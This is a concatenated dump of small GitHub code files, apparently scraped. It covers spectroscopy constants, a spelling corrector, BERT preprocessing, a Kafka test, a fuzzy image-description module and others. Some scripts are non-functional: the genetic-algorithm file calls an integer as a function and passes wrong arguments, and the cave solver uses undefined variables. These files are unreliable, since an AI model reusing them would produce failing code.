notePage_dict[\"id\"] = \"abcd1234\"\n notePage = NotePage(**notePage_dict)\n\n message = notePage.update()\n\n assert isinstance(notePage, NotePage)\n assert message == \"Error: Not Found\"\n","repo_name":"bjb28/pws-api-wrapper","sub_path":"tests/test_notePages.py","file_name":"test_notePages.py","file_ext":"py","file_size_in_byte":4909,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"13084045107","text":"\"\"\"\nWritten by @jfsmekens - Last updated 01/04/2022\n\nThis module contains a series of constants associated with gas species, as well as\n lists of colors and descriptors used to format plots\n\n\"\"\"\n# Known extensions for MIDAC files\nmidac_extensions = ['spc', 'sbm', 'ifg', 'sb', 'abs']\n\n# Invalid Extensions: do not include those when searching for spectra in a directory\ninvalid_extensions = ['pkl', 'csv', 'txt', 'ini', 'dat', 'xls', 'xlsx', 'doc', 'docx', 'jpg', 'png']\n\n# Gas species in RFM + those extracted from NIST\nrfm_gases = ['H2O', 'CO2', 'SO2', 'CO', 'NO', 'O3', 'N2O', 'NO2', 'NH3', 'HNO3', 'CH4', 'O2', 'HCl', 'HF', 'HBr',\n 'HI', 'H2S', 'N2', 'ClO', 'SF6', 'SO3']\nspecial_gases = ['SiF4']\npossible_gases = rfm_gases + special_gases\n\npossible_aeros = ['H2SO4', 'ASH', 'WATER']\n\n# Interesting Ratios: If any combination of 2 targets makes one of those ratios, it will be plotted\ninteresting_ratios = ['CO2:SO2', 'H2O:SO2', 'H2O:CO2', 'CO:SO2', 'SO2:HCl', 'SO2:HF', 'SO2:H2S', 'SO2:SO3',\n 'SO2:SiF4', 'HCl:HF', 'SO2:H2SO4', 'SO4:SO2', 'H2SO4:ASH', 'H2O:WATER', 'N/A:N/A']\n\n# Continuum Gases: gases in this list are treated differently when creating a reference\n# (include gases with continuum and/or line mixing issues)\ncontinuum_gases = ['H2O', 'CO2']\n\n# Available Apodization functions for the ILS\napod_types = ['Boxcar', 'Uniform', 'Triangular', 'Blackman-Harris', 'Happ-Genzel', 'Hamming', 'Lorenz', 'Gaussian',\n 'NB weak', 'NB medium', 'NB strong', 'Cosine']\n\n# Molecular weights of all gases\nweights = {'H2O': 18.01528,\n 'CO2': 44.01,\n 'O3': 48,\n 'N2O': 44.013,\n 'CH4': 16.04,\n 'O2': 15.999,\n 'SO2': 64.066,\n 'SO3': 80.06,\n 'HCl': 36.458,\n 'HF': 20.01,\n 'CO': 28.01,\n 'NH3': 17.031,\n 'SiF4': 104.0791,\n 'H2S': 34.1,\n 'H2SO4': 98.079,\n 'ASH': 65.0,\n 'WATER': 18.01528,\n 'ICE': 18.01528}\n\n# Plot Colors: A dedicated color for each target species\nplot_colors = {'H2O_sc': 'lightblue',\n 'H2O': 'tab:blue',\n 'CO2': 'tab:orange',\n 'O3': 'tab:pink',\n 'N2O': 'gold',\n 'CH4': 'darkviolet',\n 'SO2': 'tab:red',\n 'SO3': 'tab:orange',\n 'CO': 'maroon',\n 'HCl': 'cyan',\n 'HF': 'magenta',\n 'NH3': 'yellow',\n 'SiF4': 'purple',\n 'H2S': 'olivedrab',\n 'H2SO4': 'tab:green',\n 'ASH': 'tab:grey',\n 'WATER': 'deepskyblue',\n 'gas_temp': 'orange',\n 'E_frac': 'k',\n 'fov': 'k',\n 'max_opd': 'k',\n 'R2': 'k',\n 'RMSE': 'k',\n 'N/A': 'w',\n 'meas': 'k',\n 'model': 'r',\n 'bkg': 'r',\n 'res': 'k',\n 'scat_all': 'tab:grey',\n 'scat_scroll': 'tab:red',\n 'scat_last': 'b',\n 'regress': 'k',\n 'intercept': 'darkcyan',\n 'confidence': 'k'}\ndark_colors = {'H2O_sc': 'lightblue',\n 'H2O': 'tab:blue',\n 'CO2': 'tab:orange',\n 'O3': 'tab:pink',\n 'N2O': 'gold',\n 'CH4': 'darkviolet',\n 'SO2': 'tab:red',\n 'CO': 'maroon',\n 'HCl': 'cyan',\n 'HF': 'magenta',\n 'NH3': 'yellow',\n 'SiF4': 'purple',\n 'H2S': 'olivedrab',\n 'H2SO4': 'tab:green',\n 'ASH': 'tab:grey',\n 'WATER': 'deepskyblue',\n 'gas_temp': 'orange',\n 'fov': 'w',\n 'max_opd': 'w',\n 'R2': 'w',\n 'RMSE': 'w',\n 'N/A': 'k',\n 'meas': 'w',\n 'model': 
'r',\n 'bkg': 'r',\n 'res': 'w',\n 'scat_all': 'w',\n 'scat_scroll': 'tab:pink',\n 'scat_last': 'dodgerblue',\n 'regress': 'w',\n 'intercept': 'tab:cyan',\n 'confidence': 'w'}\n\n# Plot Color Maps: A dedicated colormap for each species\nplot_cmaps = {'H2O': 'Blues',\n 'CO2': 'Oranges',\n 'O3': 'RdPu',\n 'SO2': 'Reds',\n 'CO': 'YlOrBr',\n 'HCl': 'GnBu',\n 'HF': 'PuRd',\n 'NH3': 'YlOrBr',\n 'SiF4': 'Purples',\n 'H2S': 'YlOrBr',\n 'H2SO4': 'Greens',\n 'ASH': 'Greys',\n 'WATER': 'Blues',\n 'R2': 'Greys',\n 'RMSE': 'Greys',\n 'dt_prox': 'Oranges',\n 'dt_plume': 'Reds'}\n\n# Pretty name: Mathtext for each species to use in labels\npretty_names = {'H2O': '$H_2O$',\n 'SO2': '$SO_2$',\n 'SO3': '$SO_3$',\n 'CO2': '$CO_2$',\n 'NH3': '$NH_3$',\n 'O3': '$O_3$',\n 'N2O': '$N_2O$',\n 'CH4': '$CH_4$',\n 'CO': '$CO$',\n 'HCl': '$HCl$',\n 'HF': '$HF$',\n 'SiF4': '$SiF_4$',\n 'H2S': '$H_2S$',\n 'SO4': '$SO_4$',\n 'H2SO4': '$SO_4$ $aerosol$',\n 'ASH': '$ash$',\n 'WATER': '$H_2O$ $aerosol$',\n 'ICE': '$ICE$',\n 'time': 'Local Time',\n 'R2': '$R^2$',\n 'RMSE': 'RMS error',\n 'gas_temp': '$T_{gas}$',\n 'E_frac': r'$X{\\epsilon}$',\n 'fov': '$FOV$',\n 'max_opd': '$OPD_{max}$',\n 'N/A': '$n/a$'}\n\n# Pretty Ratios: Use the math text in pretty_names to create pretty ratios for labels\npretty_ratios = {}\nfor ratio in interesting_ratios:\n yname, xname = ratio.split(':')\n pretty_ratios[ratio] = ':'.join([pretty_names[yname], pretty_names[xname]])\n\n# Pretty Units: Mathtext with the units of SCD in molar or mass\npretty_labels = {'molar': ' SCD [$molec \\cdot cm^{-2}$]',\n 'mass': ' SCD [$g \\cdot m^{-2}$]'}\n\n# Logo: The plumeIR_dev logo, version and fonts to display them\nlogotext = 'plumeIR'\nlogofont = {'family': 'Palatino',\n 'color': 'tab:red',\n 'weight': 'bold',\n 'style': 'italic',\n 'size': 18}\nversiontext = 'v0.7'\nversionfont = {'family': 'Palatino',\n 'color': 'tab:red',\n 'weight': 'normal',\n 'style': 'italic',\n 'size': 10}\n\n# Primary windows\nprimary_windows = {'SO2': [2400, 2550],\n 'HCl': [2600, 2900],\n 'HF': [4000, 4100],\n 'CO2': [2020, 2150],\n 'SiF4': [1010, 1040]}\n\n# Secondary windows\nsecondary_windows = {'SO2': [1080, 1120],\n 'HCl': [5730.0, 5780.0],\n 'HF': [4000, 4100],\n 'CO2': [2020, 2150]}\n# Microwindows\nmicro_windows = {'SO2': [2400, 2550],\n 'HCl': [[2727.0, 2728.5], [2775.0, 2776.50], [2818.75, 2820.35], [2820.75, 2822.35], [2843.0, 2844.4],\n [2903.35, 2904.85], [2923.0, 2924.50], [2925.0, 2926.75], [2942.0, 2943.5], [2960.3, 2961.825],\n [2962.3, 2964.0], [2995.0, 2996.5]],\n 'HF': [4000, 4100],\n 'CO2': [2020, 2150]}\n\n# Unit notations\nunits = {'rad': '$mW$ / ($m^{2} \\cdot sr \\cdot cm^{-1}$)',\n 'bbt': '$K$',\n 'opt': '$a.u.$',\n 'wn': '$cm^{-1}$',\n 'um': '$\\mu$$m$',\n 'nm': '$nm$',\n 'molec.cm^-2': '$molec \\cdot cm^{-2}$',\n 'ppmm': '$ppm \\cdot m$',\n 'g.m^-2': '$g \\cdot m^{-2}$',\n 'ppmv': '$ppm$',\n 'relh': '$%$',\n 'N_density': '$cm^{-3}',\n 'N_density_SI': '$m^{-3}',\n 'g.cm^-3': '$g \\cdot cm^{-3}$',\n 'g.m^-3': '$g \\cdot m^{-3}$'}\n\n\n\n","repo_name":"jfsmekens/plumeIR","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":8031,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"29946113557","text":"\ndef can_enter_cave(x):\n x.append(\"Blank for Reasons I can't comprehend.\")\n setx = \"\"\n sety = \"\"\n row0 = x[0]\n row1 = x[1]\n row2 = x[2]\n row3 = x[3]\n row4 = x[4]\n print(row0)\n print(row1)\n print(row2)\n print(row3)\n print(row4)\n count = 0\n \n 
\n for j in range(7):\n count = 0\n if j < 1:\n pass\n else:\n sety = setx\n setx = \"\"\n for i in range(5):\n if get(i,j,row0,row1,row2,row3,row4) == 0:\n setx = setx + \"0\"\n else:\n setx = setx + \"1\"\n if j > 0:\n for i in range(5):\n if setx[i] == \"0\":\n if sety[i] == \"0\":\n count += 1\n if count == 0:\n print(\"False\")\n return False\n else:\n pass\n print(\"True\")\n return True\n \ndef get(x,y,row0,row1,row2,row3,row4):\n if x == 0:\n return row0[y]\n if x == 1:\n return row1[y]\n if x == 2:\n return row2[y]\n if x == 3:\n return row3[y]\n if x == 4:\n return row4[y]\n if x == 5:\n return row5[y]\n if x == 6:\n return row6[y]\n if x == 7:\n return row7[y]\n \ndef chkxl(x):\n if x == 0:\n return False\n else:\n return True\ndef chkxu(x):\n if x == 3:\n return False\n else:\n return True\ndef chkyl(y):\n if y == 0:\n return False\n else:\n return True\ndef chkyu(y):\n if y == 7:\n return False\n else:\n return True\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"LM5d2b6YG5vXuYiME_11.py","file_name":"LM5d2b6YG5vXuYiME_11.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72701530652","text":"# -*- coding: utf-8 -*-\r\n\r\nimport time\r\nimport Levenshtein\r\nimport jellyfish\r\nfrom functools import partial\r\nfrom multiprocessing import Pool\r\n\r\n\r\ndef levenshtein(seq1, seq2):\r\n return Levenshtein.ratio(seq1, seq2)\r\n\r\n\r\ndef compare(word1, dictionary):\r\n c1_1 = jellyfish.soundex(word1)\r\n c2_1 = jellyfish.metaphone(word1)\r\n c3_1 = jellyfish.nysiis(word1)\r\n c4_1 = jellyfish.match_rating_codex(word1)\r\n\r\n result = (0, None)\r\n\r\n for word2 in dictionary:\r\n c1_2 = jellyfish.soundex(word2)\r\n c2_2 = jellyfish.metaphone(word2)\r\n c3_2 = jellyfish.nysiis(word2)\r\n c4_2 = jellyfish.match_rating_codex(word2)\r\n c1 = levenshtein(c1_1, c1_2)\r\n c2 = levenshtein(c2_1, c2_2)\r\n c3 = levenshtein(c3_1, c3_2)\r\n c4 = levenshtein(c4_1, c4_2)\r\n\r\n sim = c1 * 0.2 + c2 * 0.3 + c3 * 0.3 + c4 * 0.2\r\n\r\n if sim > result[0]:\r\n result = (sim, word2)\r\n\r\n return result\r\n\r\n\r\ndef file_input(file_name):\r\n file_content = list()\r\n with open(file_name, 'r') as lines:\r\n for line in lines:\r\n line = line.strip()\r\n if line:\r\n file_content.append(line)\r\n return file_content\r\n\r\ndef identity(cor_list, result):\r\n length = len(result)\r\n count = 0\r\n\r\n for i in range(length):\r\n if cor_list[i] == result[i][1]:\r\n count += 1\r\n accuracy = count / length\r\n return accuracy\r\n\r\n\r\n# @warps()\r\ndef check():\r\n dictionary = file_input(\"dict.txt\")\r\n mis_list = file_input(\"mis.txt\")\r\n cor_list = file_input(\"cor.txt\")\r\n\r\n pool = Pool(8)\r\n partial_compare = partial(compare, dictionary=dictionary)\r\n result = pool.map(partial_compare, mis_list[:100])\r\n\r\n accuracy = identity(cor_list[:100], result)\r\n print(accuracy)\r\n\r\nif __name__ == \"__main__\":\r\n print(\"Running...\")\r\n check()\r\n","repo_name":"Elfsong/WintersWrath","sub_path":"KT/Soundex/Soundex.py","file_name":"Soundex.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"32"} +{"seq_id":"5328516786","text":"\nimport random\n\ndef func(x,y):\n j0=1\n return j0(x**2 + y**2) + 0.1 * abs(1 - x) + 0.1 * abs(1 - y)\n\nnum_generations = 100\npop_size = 100\npopulation = [[random.uniform(-10, 10) for _ in range(7)] for _ in range(2000)]\nmut_prob = 0.1\n\n\ndef 
genetic_algorithm(pop_size, mut_prob, num_generations):\n# Initialize the population with random solutions\n population = [random.random() for _ in range(pop_size)]\n\n # Iterate through the number of generations\n for generation in range(num_generations):\n # Calculate the fitness of each member of the population\n fitness = [func(member) for member in population]\n\n # Select the fittest members of the population for breeding\n breeding_pool = [population[i] for i in range(pop_size) if fitness[i] < min(fitness)]\n\n # Breed the selected members to create the next generation\n next_generation = []\n for i in range(0, pop_size, 2):\n parent1, parent2 = random.choice(breeding_pool), random.choice(breeding_pool)\n next_generation.append(parent1 + (parent2 - parent1) * random.random())\n next_generation.append(parent2 + (parent1 - parent2) * random.random())\n\n # Mutate the next generation with a given probability\n for i in range(pop_size):\n if random.random() < mut_prob:\n next_generation[i] += random.uniform(-1, 1)\n\n # Replace the current population with the next generation\n population = next_generation\n\n# Return the fittest member of the final population\n return min([func(member) for member in population])\n\na = genetic_algorithm(pop_size, mut_prob, num_generations)\nprint(a)","repo_name":"Roy3838/C_testing","sub_path":"Act 4/fitnessreal.py","file_name":"fitnessreal.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30349153563","text":"from uuid import uuid4\r\nfrom datetime import datetime\r\n\r\nclass BaseModel:\r\n def __init__(self, *args, **kwargs):\r\n self.id = str(uuid4())\r\n self.created_at = datetime.today()\r\n \r\n if kwargs:\r\n for key, value in kwargs.items():\r\n if key == \"created_at\":\r\n value = datetime.strptime(value, \"%Y-%m-%dT%H:%M:%S.%f\")\r\n if key != \"__class__\":\r\n self.__dict__[key] = value\r\n \r\n def __str__(self):\r\n c_name = self.__class__.__name__\r\n return \"[{}] ({}) {}\".format(c_name, self.id, self.__dict__)\r\n \r\n def to_dict(self):\r\n \"\"\"Coverts an object to a dictionary\"\"\"\r\n self_d = self.__dict__.copy()\r\n self_d[\"__class__\"] = self.__class__.__name__\r\n self_d[\"created_at\"] = self.created_at.isoformat()\r\n return self_d\r\n\r\n\r\n#new_class = BaseModel()\r\n#print(new_class)\r\n\r\n#obj_dict = {\r\n #\"id\": \"b7415ed3-48a0-4da1-afed-49cc7aa08256\",\r\n # \"created_at\": \"2022-08-24T20:25:50.018811\",\r\n # }\r\n#new_class = BaseModel(**obj_dict)\r\n#print(new_class)","repo_name":"Mwambingu/AirBnB_clone","sub_path":"Backup/tutz/test_inheritance/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72478745372","text":"from collections import namedtuple\nfrom unittest.mock import AsyncMock, patch\n\nimport pytest\n\nfrom http_nudger.persister import consume_batch\n\n\n@pytest.mark.asyncio\n@patch(\"aiokafka.AIOKafkaConsumer\")\n@patch(\"http_nudger.url_status.UrlStatus.from_json\")\nasync def test_consume_batch(url_status_from_json_mock, aio_kafka_consumer_mock):\n ConsumerRecord = namedtuple(\"ConsumerRecord\", [\"value\"])\n aio_kafka_consumer_mock.getmany = AsyncMock()\n aio_kafka_consumer_mock.getmany.return_value = {\n \"topic1\": [ConsumerRecord(\"msg1\")],\n \"topic2\": [ConsumerRecord(\"msg2\")],\n \"topic3\": [ConsumerRecord(\"msg3\")],\n }\n 
url_status_from_json_mock.side_effect = [\"something1\", \"something2\", ValueError]\n\n batch = await consume_batch(aio_kafka_consumer_mock)\n assert len(batch) == 2\n","repo_name":"askolosov/http-nudger","sub_path":"tests/test_persister.py","file_name":"test_persister.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34046200972","text":"from transformers import BertTokenizer\nimport pandas as pd\nfrom keras_preprocessing.sequence import pad_sequences\nfrom torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\nimport torch\n# import urllib.request\n\n# urllib.request.urlretrieve(\"https://raw.githubusercontent.com/e9t/nsmc/master/ratings_train.txt\", filename=\"ratings_train.txt\")\n# urllib.request.urlretrieve(\"https://raw.githubusercontent.com/e9t/nsmc/master/ratings_test.txt\", filename=\"ratings_test.txt\")\n\ntrain_data = pd.read_table('ratings_train.txt')\ntest_data = pd.read_table('ratings_test.txt')\n\nprint(train_data.shape)\nprint(train_data.groupby('label').count())\n\n# bert tokenizer\ntokenizer = BertTokenizer.from_pretrained('bert-base-multilingual-cased', do_lower_case = False)\n\ndata = train_data['document'].values\ndocuments = [\"[CLS] \" + str(d) + \" [SEP]\" for d in data]\ntokenized_doc = [tokenizer.tokenize(s) for s in documents]\n\nprint(documents[:3])\nprint(tokenized_doc[:3])\n\ninput_ids = [tokenizer.convert_tokens_to_ids(x) for x in tokenized_doc]\ninput_id = pad_sequences(input_ids, maxlen = 128, dtype = 'long',\n truncating = 'post', padding = 'post')\n\nprint(len(input_ids))\nprint(input_ids[:3])\n\nprint(input_id.shape)\nprint(input_id[:3])\n\nattention_masks = []\nfor seq in input_id:\n seq_mask = [float(i > 0) for i in seq]\n attention_masks.append(seq_mask)\nprint(attention_masks[:3])\n\ndata = TensorDataset(torch.tensor(input_id), torch.tensor(attention_masks), torch.tensor(train_data['label'].values))\ndata_seq = TensorDataset(torch.tensor(input_id), torch.tensor(attention_masks), torch.tensor([-1] * len(train_data)))\n\n# RandomSampler: shuffle, SequentialSampler: No-Shuffle\nsampler = RandomSampler(data)\nseq_sampler = SequentialSampler(data_seq)\ndata_loader = DataLoader(data, sampler = sampler, batch_size = 3)\ndata_loader_seq = DataLoader(data_seq, sampler = seq_sampler, batch_size = 3)\n\nfor i, b in enumerate(data_loader):\n if i == 1:\n break\n x = b[0]\n y = b[1]\n z = b[2]\n print(x)\n print(y)\n print(z)\n\nfor i, b in enumerate(data_loader_seq):\n if i == 1:\n break\n x = b[0]\n y = b[1]\n z = b[2]\n print(x)\n print(y)\n print(z)","repo_name":"catssci/NLP","sub_path":"한국어 임베딩/문장 수준 임베딩/BERT.py","file_name":"BERT.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37206299820","text":"# This file is used to create a description of bounding boxes on the picture found by YOLOv3\n# described in a json file.\n\nimport common\n\nsettings_file = \"settings/test.txt\"\n\n\ndef location_description(field_height, field_width, objects):\n # Properties - name, saliency(0-1), argument_type, mem_values - values for the membership function,\n # sentence - the description\n # assumed that all are trapezoid membership function\n class Property:\n def __init__(self, name, saliency, argument_type, mem_values, sentence):\n self.name = name\n self.saliency = saliency\n self.argument_type = argument_type\n self.mem_values = 
mem_values\n self.sentence = sentence\n\n f = open(settings_file, \"r\")\n property_lines = []\n relation_lines = []\n rule_lines = []\n kind_of_predicate = -1 # 0 - property, 1- relation, 2 - rule\n for x in f:\n if x.startswith('#'):\n kind_of_predicate = kind_of_predicate + 1\n continue\n if kind_of_predicate == 0:\n property_lines.append(x)\n elif kind_of_predicate == 1:\n relation_lines.append(x)\n elif kind_of_predicate == 2:\n rule_lines.append(x)\n else:\n print(\"Something went wrong in reading settings file!\")\n\n properties = []\n relations = []\n rules = []\n for prop in property_lines:\n propParams = prop.split(',')\n properties.append(Property(propParams[0], float(propParams[1]), propParams[2],\n propParams[3].split(';'), propParams[4].replace('\\n', '')))\n for rel in relation_lines:\n propParams = rel.split(',')\n relations.append(Property(propParams[0], float(propParams[1]), propParams[2],\n propParams[3].split(';'), propParams[4].replace('\\n', '')))\n\n # Rules - name, saliency(0-1), prop1, prop2 - properties that need to be true to this rule to activate,\n # operator - operator that joins two properties, sentence - the description\n # assumed that all are trapezoid membership function\n class Rule:\n def __init__(self, name, saliency, prop1, prop2, operator, sentence):\n self.name = name\n self.saliency = saliency\n self.prop1 = prop1\n self.prop2 = prop2\n self.operator = operator\n self.sentence = sentence\n\n for rule in rule_lines:\n propParams = rule.split(',')\n rules.append(Rule(propParams[0], int(propParams[1]), properties[int(propParams[2])].name,\n properties[int(propParams[3])].name, propParams[4], propParams[5].replace('\\n', '')))\n\n # Normalize objects properties by the size of the image\n for obj in objects:\n obj.boundary_left = 2 * obj.x / field_width - 1\n obj.boundary_right = 2 * (obj.x + obj.width) / field_width - 1\n obj.boundary_top = 2 * obj.y / field_height - 1\n obj.boundary_bottom = 2 * (obj.y + obj.height) / field_height - 1\n obj.size = (obj.width / field_width) * (obj.height / field_height) # saliency\n obj.width_center = (obj.boundary_right + obj.boundary_left)/2\n obj.height_center = (obj.boundary_bottom + obj.boundary_top)/2\n\n # Calculate membership function x value based on normalized properties of the object\n def membership_function_x_value(type, obj, obj2):\n if type == 'b_l': # left side\n return obj.boundary_left\n elif type == 'b_r': # right side\n return obj.boundary_right\n elif type == 'c_lr': # center of width\n return (obj.boundary_left + obj.boundary_right) / 2\n elif type == 'b_t': # top\n return obj.boundary_top\n elif type == 'b_b': # bottom\n return obj.boundary_bottom\n elif type == 'c_tb': # center of height\n return (obj.boundary_top + obj.boundary_bottom) / 2\n elif type == 'd_lr': # distance between width centroids\n return (obj.boundary_right + obj.boundary_left) / 2 - (obj2.boundary_right + obj2.boundary_left) / 2\n elif type == 'd_tb': # distance between height centroids\n return (obj.boundary_top + obj.boundary_bottom) / 2 - (obj2.boundary_top + obj2.boundary_bottom) / 2\n elif type == 'd_left': # distance between A.right and B.left\n if obj2.boundary_right < obj.boundary_left or (obj.boundary_left < obj2.boundary_left and obj.boundary_right > obj2.boundary_right):\n return -5000\n return abs(obj2.boundary_left - obj.boundary_right) + abs(obj.height_center - obj2.height_center)\n elif type == 'd_right': # distance between A.left and B.right\n if obj.boundary_left < obj2.boundary_right or (\n obj.boundary_left 
< obj2.boundary_left and obj.boundary_right > obj2.boundary_right):\n return -5000\n return abs(obj.boundary_left - obj2.boundary_right) + abs(obj.height_center - obj2.height_center)\n elif type == 'd_below': # distance between A.top and B.down\n if obj.boundary_bottom < obj2.boundary_top or (\n obj.boundary_top < obj2.boundary_top and obj.boundary_bottom > obj2.boundary_bottom):\n return -5000\n return abs(obj.boundary_top - obj2.boundary_bottom) + abs(obj.width_center - obj2.width_center)\n elif type == 'd_above': # distance between B.top and A.down\n if obj.boundary_top > obj2.boundary_bottom or (\n obj.boundary_top < obj2.boundary_top and obj.boundary_bottom > obj2.boundary_bottom):\n return -5000\n return abs(obj2.boundary_top - obj.boundary_bottom) + abs(obj.width_center - obj2.width_center)\n elif type == 'd_inside':\n if obj2.boundary_left > obj.boundary_left or obj2.boundary_right < obj.boundary_right or obj2.boundary_top > obj.boundary_top or obj2.boundary_bottom < obj.boundary_bottom :\n return -5000\n return 0 # it should give the membership function value = 1\n elif type == 'd':\n print(\"Not supported\")\n return 7000\n else:\n print(\"Something went wrong during calculating membership x value;/\")\n return -7100\n\n # Calculate membership y value based on x value and the membership function\n def membership_y_value(property, value):\n if value < float(property.mem_values[0]):\n return 0\n elif value < float(property.mem_values[1]):\n return (value - float(property.mem_values[0])) / (\n float(property.mem_values[1]) - float(property.mem_values[0]))\n elif value < float(property.mem_values[2]):\n return 1\n elif value < float(property.mem_values[3]):\n return (float(property.mem_values[3]) - value) / (\n float(property.mem_values[3]) - float(property.mem_values[2]))\n else:\n return 0\n\n # Membership Value Function of an object to specific property\n obj_prop = []\n for prop in properties:\n temp = []\n for obj in objects:\n temp.append(membership_y_value(prop, membership_function_x_value(prop.argument_type, obj, 0)))\n obj_prop.append(temp)\n\n # Membership Value Function of two objects to specific relation\n obj_rel = []\n for rel in relations:\n tempOutside = []\n for objOutside in objects:\n tempInside = []\n for objInside in objects:\n tempInside.append(\n membership_y_value(rel, membership_function_x_value(rel.argument_type, objOutside, objInside)))\n tempOutside.append(tempInside)\n obj_rel.append(tempOutside)\n\n # Add predicates - name, certainty factor, is_used, number of object, number of second object (for relations only),\n # number of property/relation, membership value\n pred = []\n rel_pred = []\n for i in range(len(objects)):\n for j in range(len(properties)):\n if obj_prop[j][i] > 0:\n temp = [properties[j].name, obj_prop[j][i] * objects[i].size * properties[j].saliency, 0, i, -1, j,\n obj_prop[j][i]]\n pred.append(temp)\n\n for k in range(len(objects)):\n for j in range(len(relations)):\n if obj_rel[j][i][k] > 0 and i != k:\n temp = [relations[j].name, obj_rel[j][i][k]* relations[j].saliency, 0, i, k, j, obj_rel[j][i][k]]\n # deleted multiplying by size of object in relations\n rel_pred.append(temp)\n\n for i in range(len(rules)):\n for j in range(len(pred)):\n if pred[j][0] == rules[i].prop1:\n obj_found = pred[j][3]\n for k in range(len(pred)):\n if pred[k][0] == rules[i].prop2 and pred[k][3] == obj_found:\n if pred[j][6] != 0 and pred[k][6] != 0:\n ruleobj_cf = min(pred[j][6], pred[k][6]) # assumed it's min value\n temp = [rules[i].name, ruleobj_cf * 
objects[obj_found].size * rules[i].saliency, 0,\n obj_found,\n -2, i, ruleobj_cf]\n pred.append(temp)\n # Sort\n rel_pred.sort(key=lambda p: p[1], reverse=True)\n\n # for pr in rel_pred: # pr[5]-> number of relations\n # print(objects[pr[3]].name + \" \" + relations[pr[5]].sentence + \" \" + objects[pr[4]].name + \" CF: \" + str(pr[1]))\n\n # Sort\n pred.sort(key=lambda p: p[1], reverse=True)\n # print(\"sorted predicates:\")\n # for pr in pred:\n # if pr[4] == -1:\n # print(objects[pr[3]].name + \" \" + properties[pr[5]].sentence + \" CF: \" + str(pr[1]))\n # elif pr[4] == -2:\n # print(objects[pr[3]].name + \" \" + rules[pr[5]].sentence + \" CF: \" + str(pr[1]))\n # else:\n # print(objects[pr[3]].name + \" \" + relations[pr[5]].sentence + \" \" + objects[pr[4]].name + \" CF: \" + str(\n # pr[1]))\n\n def kindOfPredicate(pred):\n if pred[4] == -1: # property\n if properties[pred[5]].argument_type == 'b_l' or properties[pred[5]].argument_type == 'c_lr' or properties[\n pred[5]].argument_type == 'b_r':\n return 'X'\n if pred[4] == -2: # rule\n if rules[pred[5]].name == 'width':\n return 'X'\n if rules[pred[5]].name == 'height':\n return 'Y'\n return 'BOTH'\n return 'Y'\n\n # Predicate selection\n usedX = []\n usedY = []\n for obj in objects:\n usedX.append(0)\n usedY.append(0)\n\n for i in range(len(pred)):\n if kindOfPredicate(pred[i]) == 'BOTH':\n if usedX[pred[i][3]] < 1 and usedY[pred[i][3]] < 1:\n usedX[pred[i][3]] = usedX[pred[i][3]] + 1\n usedY[pred[i][3]] = usedY[pred[i][3]] + 1\n pred[i][2] = 1\n elif kindOfPredicate(pred[i]) == 'X':\n if usedX[pred[i][3]] < 1:\n usedX[pred[i][3]] = usedX[pred[i][3]] + 1\n pred[i][2] = 1\n else:\n if usedY[pred[i][3]] < 1:\n usedY[pred[i][3]] = usedY[pred[i][3]] + 1\n pred[i][2] = 1\n pred_out = []\n for i in range(len(pred)):\n if pred[i][1] > 0 and pred[i][2] == 1:\n pred_out.append(pred[i])\n\n # Print sentences\n desc = []\n sentence = ''\n for i in range(len(pred_out)):\n if pred_out[i][4] == -1: # predicate\n sentence = objects[pred_out[i][3]].name + \" \" + properties[pred_out[i][5]].sentence\n elif pred_out[i][4] == -2: # rule\n sentence = objects[pred_out[i][3]].name + \" \" + rules[pred_out[i][5]].sentence\n sentence = sentence.capitalize()\n desc.append(sentence)\n\n usedRel = []\n for obj in objects:\n usedRel.append(0)\n\n # relations:\n for i in range(len(rel_pred)):\n # print(\"REL: \" + str(rel_pred[i][1])) -> to print values for relations\n # Decided to use every object once (at least if there is an even number of them)\n if usedRel[rel_pred[i][3]] == 1 or usedRel[rel_pred[i][4]] == 1:\n continue\n sentence = objects[rel_pred[i][3]].name + \" \" + relations[rel_pred[i][5]].sentence + \" \" + objects[\n rel_pred[i][4]].name + '.'\n sentence = sentence.capitalize()\n usedRel[rel_pred[i][3]] = 1\n usedRel[rel_pred[i][4]] = 1\n desc.append(sentence)\n\n TEXT = ''\n for description in desc:\n TEXT = TEXT + description + '\\n'\n return TEXT\n","repo_name":"sebek5000/magisterka","sub_path":"location_description.py","file_name":"location_description.py","file_ext":"py","file_size_in_byte":12658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37943876296","text":"from synth.semantic import DSLEvaluator\nfrom synth.syntax import DSL, INT, Arrow, PolymorphicType, List\n\nt0 = PolymorphicType(\"t0\")\nt1 = PolymorphicType(\"t1\")\n\n\ndef __access__(i, l):\n if i is None:\n return None\n elif (i >= 0 and len(l) > i) or (i < 0 and len(l) >= -i):\n return l[i]\n else:\n return 
